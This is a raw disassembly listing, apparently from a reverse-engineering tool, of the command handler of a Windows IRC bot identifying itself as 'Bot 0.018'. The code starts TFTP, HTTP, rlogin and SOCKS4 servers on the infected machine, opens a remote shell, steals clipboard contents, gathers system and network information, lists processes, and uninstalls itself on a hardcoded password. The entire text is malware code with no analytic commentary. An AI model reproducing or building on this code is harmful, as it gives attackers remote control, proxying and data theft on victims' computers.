lea eax, [ebp+var_74C]
push eax
push edi
call ds:dword_41F010
loc_40B665: ; CODE XREF: sub_4078FA+3D5A�j
mov ebx, [ebp+ebx+var_9C]
cmp ebx, edi
jnz short loc_40B675
mov ebx, offset byte_42AED0
loc_40B675: ; CODE XREF: sub_4078FA+3D74�j
push ebx
lea eax, [ebp+var_648]
push esi
push eax
call sub_412E0D
mov eax, dword_42AE44
mov [ebp+var_53C], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_750], eax
lea eax, [ebp+var_538]
push eax
mov [ebp+var_540], edi
call sub_412C40
mov eax, [ebp+var_4]
mov [ebp+var_4B8], eax
mov eax, [ebp+var_C]
mov [ebp+var_4B4], eax
lea eax, [ebp+var_648]
push eax
lea eax, [ebp+var_74C]
push eax
push [ebp+var_53C]
lea eax, [ebp+var_2E0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 5
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_544], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_750]
push eax
push offset sub_410A22
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_544]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B757
call ds:dword_41F008
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
loc_40B73B: ; CODE XREF: sub_4078FA+4F9C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B74F: ; CODE XREF: sub_4078FA+3E63�j
push 32h
call ds:dword_41F000
loc_40B757: ; CODE XREF: sub_4078FA+3E33�j
cmp [ebp+var_4B0], edi
jz short loc_40B74F
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B764: ; CODE XREF: sub_4078FA+1808�j
; sub_4078FA+181C�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B783
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B783
push esi
call sub_412F42
pop ecx
jmp short loc_40B788
; ---------------------------------------------------------------------------
loc_40B783: ; CODE XREF: sub_4078FA+3E73�j
; sub_4078FA+3E7E�j
mov eax, dword_42AE48
loc_40B788: ; CODE XREF: sub_4078FA+3E87�j
mov ebx, [ebp+ebx+var_9C]
mov [ebp+var_C24], eax
xor eax, eax
cmp [ebp+var_448], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_C10], eax
jz short loc_40B7BD
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40B7E8
; ---------------------------------------------------------------------------
loc_40B7BD: ; CODE XREF: sub_4078FA+3EB0�j
push 104h
lea eax, [ebp+var_B74]
push eax
call ds:dword_41F040
push edi
push edi
push edi
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_B74]
push eax
call sub_4141AD
add esp, 14h
loc_40B7E8: ; CODE XREF: sub_4078FA+3EC1�j
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B7F1: ; CODE XREF: sub_4078FA+3EFC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B7F1
sub eax, edx
cmp [ebp+eax+var_D29], 5Ch
jnz short loc_40B81D
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B80D: ; CODE XREF: sub_4078FA+3F18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B80D
sub eax, edx
and [ebp+eax+var_D29], cl
loc_40B81D: ; CODE XREF: sub_4078FA+3F08�j
push [ebp+var_9C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_FB0]
push 80h
push eax
mov [ebp+var_FB4], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_C14], eax
lea eax, [ebp+var_D28]
push eax
push [ebp+var_C24]
mov [ebp+var_C18], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 4
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_C1C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FB4]
push eax
push offset sub_403E06
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_C1C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B8D8
call ds:dword_41F008
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40B8D0: ; CODE XREF: sub_4078FA+3FE4�j
push 32h
call ds:dword_41F000
loc_40B8D8: ; CODE XREF: sub_4078FA+3FC3�j
cmp [ebp+var_C08], edi
jz short loc_40B8D0
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40B8E5: ; CODE XREF: sub_4078FA+17E0�j
; sub_4078FA+17F4�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B904
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B904
push esi
call sub_412F42
pop ecx
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B904: ; CODE XREF: sub_4078FA+3FF4�j
; sub_4078FA+3FFF�j
mov eax, dword_42AE4C
loc_40B909: ; CODE XREF: sub_4078FA+4008�j
mov [ebp+var_890], eax
mov eax, [ebp+ebx+var_9C]
xor edi, edi
cmp eax, edi
jnz short loc_40B922
lea eax, [ebp+var_E0]
loc_40B922: ; CODE XREF: sub_4078FA+4020�j
push eax
lea eax, [ebp+var_9D0]
push 40h
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_98]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40B944
mov ebx, 41FA76h
loc_40B944: ; CODE XREF: sub_4078FA+4043�j
push ebx
lea eax, [ebp+var_990]
push 100h
push eax
call sub_412E0D
push [ebp+var_9C]
lea eax, [ebp+var_A50]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_87C], eax
lea eax, [ebp+var_9D0]
push eax
push [ebp+var_890]
mov [ebp+var_A54], esi
push esi
mov [ebp+var_880], ebx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 7
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_88C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A54]
push eax
push offset sub_40E219
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_88C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40BA11
call ds:dword_41F008
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40BA09: ; CODE XREF: sub_4078FA+411D�j
push 32h
call ds:dword_41F000
loc_40BA11: ; CODE XREF: sub_4078FA+40FC�j
cmp [ebp+var_878], edi
jz short loc_40BA09
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40BA1E: ; CODE XREF: sub_4078FA+17B8�j
; sub_4078FA+17CC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BA31
push ebx
call sub_412F42
jmp short loc_40BA38
; ---------------------------------------------------------------------------
loc_40BA31: ; CODE XREF: sub_4078FA+412D�j
push 9
call sub_4110F9
loc_40BA38: ; CODE XREF: sub_4078FA+4135�j
test eax, eax
pop ecx
jz loc_40CFE2
push eax
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40BF27
; ---------------------------------------------------------------------------
loc_40BA58: ; CODE XREF: sub_4078FA+1790�j
; sub_4078FA+17A4�j
mov eax, dword_433584
test eax, eax
jz short loc_40BA7B
call eax
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BA74
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA74: ; CODE XREF: sub_4078FA+4171�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA7B: ; CODE XREF: sub_4078FA+4165�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2E0]
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA88: ; CODE XREF: sub_4078FA+1768�j
; sub_4078FA+177C�j
call sub_406B55
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BAAC
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40BA9C: ; CODE XREF: sub_4078FA+4178�j
; sub_4078FA+417F�j ...
push 200h
push eax
call sub_412E0D
jmp loc_40C3B3
; ---------------------------------------------------------------------------
loc_40BAAC: ; CODE XREF: sub_4078FA+419B�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_4078FA+1740�j
; sub_4078FA+1754�j
cmp [ebp+var_C], 0
jnz short loc_40BAD4
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BAD4: ; CODE XREF: sub_4078FA+41BD�j
push 0
push [ebp+var_4]
call sub_405792
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BAF7: ; CODE XREF: sub_4078FA+13B1�j
; sub_4078FA+13C5�j
push 8
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BB0D
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB0D: ; CODE XREF: sub_4078FA+4207�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_40DDC6
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40BB2C
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB2C: ; CODE XREF: sub_4078FA+4226�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB36: ; CODE XREF: sub_4078FA+1389�j
; sub_4078FA+139D�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405277
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB4F: ; CODE XREF: sub_4078FA+1361�j
; sub_4078FA+1375�j
push [ebp+ebx+var_A0]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_402717
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_4078FA+1339�j
; sub_4078FA+134D�j
or esi, 0FFFFFFFFh
call ds:dword_41F004
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov edi, eax
jz short loc_40BB94
push ebx
call sub_412F42
pop ecx
mov esi, eax
loc_40BB94: ; CODE XREF: sub_4078FA+428F�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40BBAC
cmp esi, 0FFFFFFFFh
jnz loc_40CFE2
loc_40BBAC: ; CODE XREF: sub_4078FA+42A7�j
push 0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
loc_40BBEB: ; CODE XREF: sub_4078FA+2412�j
add esp, 28h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BBF3: ; CODE XREF: sub_4078FA+1311�j
; sub_4078FA+1325�j
push 1Fh
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BC29
cmp [ebp+var_C], 0
jnz loc_407B7B
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40BC13: ; CODE XREF: sub_4078FA+1F21�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BC29: ; CODE XREF: sub_4078FA+4303�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
and [ebp+var_3BC], 0
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3B4], eax
jz short loc_40BC8A
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40BC8A
mov [ebp+var_3BC], 1
loc_40BC8A: ; CODE XREF: sub_4078FA+4374�j
; sub_4078FA+4384�j
lea eax, [ebp+var_2E0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Fh
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_4073FB
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BD0C
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD04: ; CODE XREF: sub_4078FA+4418�j
push 32h
call ds:dword_41F000
loc_40BD0C: ; CODE XREF: sub_4078FA+43E8�j
cmp [ebp+var_3B0], esi
jz short loc_40BD04
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD19: ; CODE XREF: sub_4078FA+12E9�j
; sub_4078FA+12FD�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz loc_407B7B
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40BD2F: ; CODE XREF: sub_4078FA+4451�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40BD51
test cl, cl
jz short loc_40BD4D
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40BD51
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40BD2F
loc_40BD4D: ; CODE XREF: sub_4078FA+443F�j
xor eax, eax
jmp short loc_40BD56
; ---------------------------------------------------------------------------
loc_40BD51: ; CODE XREF: sub_4078FA+443B�j
; sub_4078FA+4449�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40BD56: ; CODE XREF: sub_4078FA+4455�j
test eax, eax
jnz loc_407B7B
cmp [ebp+var_C], eax
jnz short loc_40BD7D
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BD7D: ; CODE XREF: sub_4078FA+4467�j
push [ebp+arg_4]
call dword_4335AC
call dword_4335B8
call sub_405915
jmp loc_40C4C6
; ---------------------------------------------------------------------------
loc_40BD96: ; CODE XREF: sub_4078FA+12C1�j
; sub_4078FA+12D5�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push eax
call sub_40FE1F
pop ecx
pop ecx
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BDC2: ; CODE XREF: sub_4078FA+1299�j
; sub_4078FA+12AD�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40BDF0: ; CODE XREF: sub_4078FA+41F8�j
; sub_4078FA+44C6�j
call sub_401C33
loc_40BDF5: ; CODE XREF: sub_4078FA+3006�j
add esp, 18h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BDFD: ; CODE XREF: sub_4078FA+1271�j
; sub_4078FA+1285�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401CD3
loc_40BE11: ; CODE XREF: sub_4078FA+1E2�j
; sub_4078FA+4250�j ...
add esp, 10h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_4078FA+1249�j
; sub_4078FA+125D�j
and [ebp+var_B00], 0
cmp [ebp+var_14], 0
jz short loc_40BE5A
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BE5A
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40BE5A
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_B00]
push 80h
push eax
call sub_412E0D
add esp, 10h
loc_40BE5A: ; CODE XREF: sub_4078FA+452A�j
; sub_4078FA+4535�j ...
push [ebp+var_9C]
lea eax, [ebp+var_B80]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_B84], eax
mov eax, [ebp+var_4]
mov [ebp+var_A7C], eax
mov eax, [ebp+var_C]
mov [ebp+var_A78], eax
lea eax, [ebp+var_2E0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Dh
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_A80], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_B84]
push eax
push offset sub_401D45
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_A80]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BEFF
call ds:dword_41F008
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40BEF7: ; CODE XREF: sub_4078FA+460B�j
push 32h
call ds:dword_41F000
loc_40BEFF: ; CODE XREF: sub_4078FA+45EA�j
cmp [ebp+var_A74], esi
jz short loc_40BEF7
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BF0C: ; CODE XREF: sub_4078FA+1221�j
; sub_4078FA+1235�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401BBB
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401C33
loc_40BF27: ; CODE XREF: sub_4078FA+4159�j
add esp, 10h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BF2F: ; CODE XREF: sub_4078FA+11F9�j
; sub_4078FA+120D�j
push [ebp+var_9C]
lea eax, [ebp+var_374]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_378], eax
mov eax, [ebp+var_4]
mov [ebp+var_2EC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2E8], eax
jz short loc_40BF88
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_2F0], eax
jmp short loc_40BF8F
; ---------------------------------------------------------------------------
loc_40BF88: ; CODE XREF: sub_4078FA+4673�j
and [ebp+var_2F0], 0
loc_40BF8F: ; CODE XREF: sub_4078FA+468C�j
lea eax, [ebp+var_2E0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 20h
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_378]
push eax
push offset sub_4111EB
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C011
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C009: ; CODE XREF: sub_4078FA+471D�j
push 32h
call ds:dword_41F000
loc_40C011: ; CODE XREF: sub_4078FA+46ED�j
cmp [ebp+var_2E4], esi
jz short loc_40C009
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C01E: ; CODE XREF: sub_4078FA+117F�j
; sub_4078FA+1193�j
push offset aBot018 ; "Bot018"
lea eax, [ebp+var_2E0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C056: ; CODE XREF: sub_4078FA+1157�j
; sub_4078FA+116B�j
push dword_479BB0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C095: ; CODE XREF: sub_4078FA+112F�j
; sub_4078FA+1143�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C0C8
cmp [ebp+var_14], 0
jz short loc_40C0D7
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40C0D7
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 0Ch
jmp short loc_40C0D7
; ---------------------------------------------------------------------------
loc_40C0C8: ; CODE XREF: sub_4078FA+47A4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_404592
pop ecx
pop ecx
loc_40C0D7: ; CODE XREF: sub_4078FA+47AA�j
; sub_4078FA+47B9�j ...
push 0FFFFFFFEh
pop eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C0DF: ; CODE XREF: sub_4078FA+1107�j
; sub_4078FA+111B�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401C33
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C101: ; CODE XREF: sub_4078FA+10DF�j
; sub_4078FA+10F3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401C33
add esp, 0Ch
xor eax, eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C122: ; CODE XREF: sub_4078FA+10B7�j
; sub_4078FA+10CB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401000
loc_40C133: ; CODE XREF: sub_4078FA+2F6D�j
add esp, 0Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40C13B: ; CODE XREF: sub_4078FA+1017�j
; sub_4078FA+102B�j
push [ebp+ebx+var_A0]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
loc_40C14E: ; CODE XREF: sub_4078FA+E54�j
; sub_4078FA+E7C�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C16A: ; CODE XREF: sub_4078FA+E17�j
; sub_4078FA+E2B�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40C189
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40C189
push esi
call sub_412F42
pop ecx
jmp short loc_40C18E
; ---------------------------------------------------------------------------
loc_40C189: ; CODE XREF: sub_4078FA+4879�j
; sub_4078FA+4884�j
mov eax, dword_42AE40
loc_40C18E: ; CODE XREF: sub_4078FA+488D�j
mov ebx, [ebp+ebx+var_9C]
xor edi, edi
cmp ebx, edi
mov [ebp+var_2FC], eax
jz short loc_40C1B5
push ebx
loc_40C1A2: ; CODE XREF: sub_4078FA+48CB�j
lea eax, [ebp+var_30C]
push 10h
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40C1CE
; ---------------------------------------------------------------------------
loc_40C1B5: ; CODE XREF: sub_4078FA+48A5�j
cmp [ebp+var_44B], 0
jz short loc_40C1C7
lea eax, [ebp+var_E0]
push eax
jmp short loc_40C1A2
; ---------------------------------------------------------------------------
loc_40C1C7: ; CODE XREF: sub_4078FA+48C2�j
and [ebp+var_30C], 0
loc_40C1CE: ; CODE XREF: sub_4078FA+48B9�j
mov eax, [ebp+var_4]
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_2F0], eax
mov eax, [ebp+var_C]
mov [ebp+var_2EC], eax
lea eax, [ebp+var_38C]
push 80h
push eax
mov [ebp+var_390], esi
call sub_412E0D
add esp, 0Ch
push [ebp+var_2FC]
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 12h
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_2F8], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_390]
push eax
push offset sub_40FB2A
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_2F8]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C282
call ds:dword_41F008
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40C27A: ; CODE XREF: sub_4078FA+498E�j
push 32h
call ds:dword_41F000
loc_40C282: ; CODE XREF: sub_4078FA+496D�j
cmp [ebp+var_2E8], edi
jz short loc_40C27A
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C28F: ; CODE XREF: sub_4078FA+DC7�j
; sub_4078FA+DDB�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40C2B7
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C2B7
and [ebp+var_3BC], eax
jmp short loc_40C2C1
; ---------------------------------------------------------------------------
loc_40C2B7: ; CODE XREF: sub_4078FA+49A3�j
; sub_4078FA+49B3�j
mov [ebp+var_3BC], 1
loc_40C2C1: ; CODE XREF: sub_4078FA+49BB�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_3BC], esi
mov [ebp+var_3B4], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40C30A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40C30A: ; CODE XREF: sub_4078FA+4A09�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push esi
lea eax, [ebp+var_2E0]
push 1Ah
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_40F023
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C390
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C388: ; CODE XREF: sub_4078FA+4A9C�j
push 32h
call ds:dword_41F000
loc_40C390: ; CODE XREF: sub_4078FA+4A6C�j
cmp [ebp+var_3B0], esi
jz short loc_40C388
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C39D: ; CODE XREF: sub_4078FA+D9F�j
; sub_4078FA+DB3�j
push offset aBot0_018 ; "[Bot 0.018]"
lea eax, [ebp+var_2E0]
push offset aMainS ; "[MAIN]: %s"
push eax
call sub_412BB5
